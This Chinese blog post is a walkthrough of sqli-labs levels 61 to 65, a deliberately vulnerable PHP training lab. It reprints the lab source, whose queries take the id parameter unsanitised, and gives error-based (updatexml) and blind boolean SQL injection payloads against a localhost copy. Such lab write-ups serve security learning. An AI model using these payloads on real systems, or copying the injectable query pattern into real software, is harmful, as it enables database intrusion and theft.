sqli-labs Less 61 -> sqli labs Less 65

  1. 前言
  2. 正文

前言


把sqli-labs玩穿了,感觉学到的东西还是N多的。继续闯一下靶场
a4af-hnprhzw9116450.jpg

BGM :Lover Boy 88

正文


61关
代码如下:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-61:Challenge-8</title>
</head>

<body bgcolor="#000000">
<div style ="text-align:right">
<form action="" method="post">
<input  type="submit" name="reset" value="Reset the Challenge!" />
</form>
</div>
</right>
<div style=" margin-top:20px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">



<?php
//including the Mysql connect parameters.
include '../sql-connections/sql-connect-1.php';
include '../sql-connections/functions.php';
error_reporting(0);
$pag = $_SERVER['PHP_SELF']; //generating page address to piggy back after redirects...
$characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; //characterset for generating random data
$times= 5;
$table = table_name();
$col = column_name(1);     // session id column name
$col1 = column_name(2);   //secret key column name


// Submitting the final answer
if(!isset($_POST['answer_key']))
{
    // resetting the challenge and repopulating the table .
    if(isset($_POST['reset']))
    {
        setcookie('challenge', ' ', time() - 3600000);
        echo "<font size=4>You have reset the Challenge</font><br>\n";
        echo "Redirecting you to main challenge page..........\n";
        header( "refresh:4;url=../sql-connections/setup-db-challenge.php?id=$pag" );
        //echo "cookie expired";

    }
    else
    {
        // Checking the cookie on the page and populate the table with random value.
        if(isset($_COOKIE['challenge']))
        {
            $sessid=$_COOKIE['challenge'];
            //echo "Cookie value: ".$sessid;
        }
        else
        {
            $expire = time()+60*60*24*30;
            $hash = data($table,$col);
            setcookie("challenge", $hash, $expire);

        }

        echo "<br>\n";

        // take the variables
        if(isset($_GET['id']))
        {
            $id=$_GET['id'];

            //logging the connection parameters to a file for analysis.
            $fp=fopen('result.txt','a');
            fwrite($fp,'ID:'.$id."\n");
            fclose($fp);


            //update the counter in database
            next_tryy();

            //Display attempts on screen.
            $tryyy = view_attempts();
            echo "You have made : ". $tryyy ." of $times attempts";
            echo "<br><br><br>\n";


            //Reset the Database if you exceed allowed attempts.
            if($tryyy >= ($times+1))
            {
                setcookie('challenge', ' ', time() - 3600000);
                echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";
                echo "Redirecting you to challenge page..........\n";
                header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );
                echo "<br>\n";
            }    



            // Querry DB to get the correct output
            $sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
            $result=mysql_query($sql);
            $row = mysql_fetch_array($result);

            if($row)
            {
                echo '<font color= "#00FFFF">';    
                $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
                $pass = array_reverse($unames);
                echo 'Your Login name : '. $unames[$row['id']];
                echo "<br>";
                echo 'Your Password : ' .$pass[$row['id']];
                echo "</font>";
            }
            else 
            {
                echo '<font color= "#FFFF00">';
                print_r(mysql_error());
                echo "</font>";  
            }
        }
        else
        {
            echo "Please input the ID as parameter with numeric value as done in  Lab excercises\n<br><br>\n</font>";
            echo "<font color='#00FFFF': size=3>The objective of this challenge is to dump the <b>(secret key)</b> from only random table from Database <b><i>('CHALLENGES')</i></b> in Less than $times attempts<br>";
            echo "For fun, with every reset, the challenge spawns random table name, column name, table data. Keeping it fresh at all times.<br>" ;
        }

    }


?>
</font> </div></br></br></br><center>
<img src="../images/Less-61.jpg" />
</center>
<br><br><br>
<div  style=" color:#00FFFF; font-size:18px; text-align:center">
<form name="input" action="" method="post">
Submit Secret Key: <input type="text" name="key">
<input type="submit" name = "answer_key" value="Submit">
</form> 
</div>


<?php

}

else
{
    echo '<div  style=" color:#00FFFF; font-size:18px; text-align:center">';
    $key = addslashes($_POST['key']);
    $key = mysql_real_escape_string($key);
    //echo $key;
    //Query table to verify your result
    $sql="SELECT 1 FROM $table WHERE $col1= '$key'";
    //echo "$sql";
    $result=mysql_query($sql)or die("error in submittion of Key Solution".mysql_error());

    $row = mysql_fetch_array($result);

    if($row)
    {
        echo '<font color= "#FFFF00">';
        echo "\n<br><br><br>";
        echo '<img src="../images/Less-54-1.jpg" />';
        echo "</font>"; 
        header( "refresh:4;url=../sql-connections/setup-db-challenge.php?id=$pag" );    
    }
    else 
    {
        echo '<font color= "#FFFF00">';
        echo "\n<br><br><br>";
        echo '<img src="../images/slap1.jpg" />';
        header( "refresh:3;url=index.php" );
        //print_r(mysql_error());
        echo "</font>";  
            }    


}

?>

</body>
</html>

无法正确回显,但是输出了mysql报错。可以使用报错注入
payload:

and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema="challenges"),0x7e),1)
and updatexml(1,concat(0x7e,((select group_concat(`2`) from (select 1,2,3,4 union select * from 表名)a)),0x7e),1)

k4nWa6.md.png

第62关
代码如下:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-62:Challenge-9</title>
</head>

<body bgcolor="#000000">
<div style ="text-align:right">
<form action="" method="post">
<input  type="submit" name="reset" value="Reset the Challenge!" />
</form>
</div>
</right>
<div style=" margin-top:20px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">



<?php
//including the Mysql connect parameters.
include '../sql-connections/sql-connect-1.php';
include '../sql-connections/functions.php';
error_reporting(0);
$pag = $_SERVER['PHP_SELF']; //generating page address to piggy back after redirects...
$characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; //characterset for generating random data
$times= 130;
$table = table_name();
$col = column_name(1);     // session id column name
$col1 = column_name(2);   //secret key column name


// Submitting the final answer
if(!isset($_POST['answer_key']))
{
    // resetting the challenge and repopulating the table .
    if(isset($_POST['reset']))
    {
        setcookie('challenge', ' ', time() - 3600000);
        echo "<font size=4>You have reset the Challenge</font><br>\n";
        echo "Redirecting you to main challenge page..........\n";
        header( "refresh:4;url=../sql-connections/setup-db-challenge.php?id=$pag" );
        //echo "cookie expired";

    }
    else
    {
        // Checking the cookie on the page and populate the table with random value.
        if(isset($_COOKIE['challenge']))
        {
            $sessid=$_COOKIE['challenge'];
            //echo "Cookie value: ".$sessid;
        }
        else
        {
            $expire = time()+60*60*24*30;
            $hash = data($table,$col);
            setcookie("challenge", $hash, $expire);

        }

        echo "<br>\n";

        // take the variables
        if(isset($_GET['id']))
        {
            $id=$_GET['id'];

            //logging the connection parameters to a file for analysis.
            $fp=fopen('result.txt','a');
            fwrite($fp,'ID:'.$id."\n");
            fclose($fp);


            //update the counter in database
            next_tryy();

            //Display attempts on screen.
            $tryyy = view_attempts();
            echo "You have made : ". $tryyy ." of $times attempts";
            echo "<br><br><br>\n";


            //Reset the Database if you exceed allowed attempts.
            if($tryyy >= ($times+1))
            {
                setcookie('challenge', ' ', time() - 3600000);
                echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";
                echo "Redirecting you to challenge page..........\n";
                header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );
                echo "<br>\n";
            }    



            // Querry DB to get the correct output
            $sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
            $result=mysql_query($sql);
            $row = mysql_fetch_array($result);

            if($row)
            {
                echo '<font color= "#00FFFF">';    
                $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
                $pass = array_reverse($unames);
                echo 'Your Login name : '. $unames[$row['id']];
                echo "<br>";
                echo 'Your Password : ' .$pass[$row['id']];
                echo "</font>";
            }
            else 
            {
                echo '<font color= "#FFFF00">';
//                print_r(mysql_error());
                echo "</font>";  
            }
        }
        else
        {
            echo "Please input the ID as parameter with numeric value as done in  Lab excercises\n<br><br>\n</font>";
            echo "<font color='#00FFFF': size=3>The objective of this challenge is to dump the <b>(secret key)</b> from only random table from Database <b><i>('CHALLENGES')</i></b> in Less than $times attempts<br>";
            echo "For fun, with every reset, the challenge spawns random table name, column name, table data. Keeping it fresh at all times.<br>" ;
        }

    }


?>
</font> </div></br></br></br><center>
<img src="../images/Less-62.jpg" />
</center>
<br><br><br>
<div  style=" color:#00FFFF; font-size:18px; text-align:center">
<form name="input" action="" method="post">
Submit Secret Key: <input type="text" name="key">
<input type="submit" name = "answer_key" value="Submit">
</form> 
</div>


<?php

}

else
{
    echo '<div  style=" color:#00FFFF; font-size:18px; text-align:center">';
    $key = addslashes($_POST['key']);
    $key = mysql_real_escape_string($key);
    //echo $key;
    //Query table to verify your result
    $sql="SELECT 1 FROM $table WHERE $col1= '$key'";
    //echo "$sql";
    $result=mysql_query($sql)or die("error in submittion of Key Solution".mysql_error());

    $row = mysql_fetch_array($result);

    if($row)
    {
        echo '<font color= "#FFFF00">';
        echo "\n<br><br><br>";
        echo '<img src="../images/Less-54-1.jpg" />';

        echo "</font>";
        header( "refresh:4;url=../sql-connections/setup-db-challenge.php?id=$pag" );     
    }
    else 
    {
        echo '<font color= "#FFFF00">';
        echo "\n<br><br><br>";
        echo '<img src="../images/slap1.jpg" />';
        header( "refresh:3;url=index.php" );
        //print_r(mysql_error());
        echo "</font>";  
            }    


}

?>

</body>
</html>

闭合方式变了,不输出mysql报错,无法报错注入,只能盲注了

and(length(database())=10)

k4ukd0.png

payload如下:

http://127.0.0.1/sqli-labs-master/Less-62/?id=1%27)%20and(1=(select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=%22challenges%22))%20--+
http://127.0.0.1/sqli-labs-master/Less-62/?id=1%27)%20and(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%22challenges%22%20limit%200,1),10,1)))%20--+
然后跑表名,然后跑列名:
http://127.0.0.1/sqli-labs-master/Less-62/?id=1%27)%20and(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%22challenges%22%20limit%200,1),1,1))=104)%20--+
http://127.0.0.1/sqli-labs-master/Less-62/?id=1%27)%20and(ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name=%22hjvgjkpvnm%22%20limit%200,1),1,1)))--+
略过...........

第63关-65关都是盲注…,这里就不重复了

转载请声明:转自422926799.github.io


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:sqli-labs Less 61 -> sqli labs Less 65

本文作者:九世

发布时间:2019-02-24, 10:09:16

最后更新:2019-04-19, 20:36:16

原始链接:http://422926799.github.io/posts/2f16a4c2.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录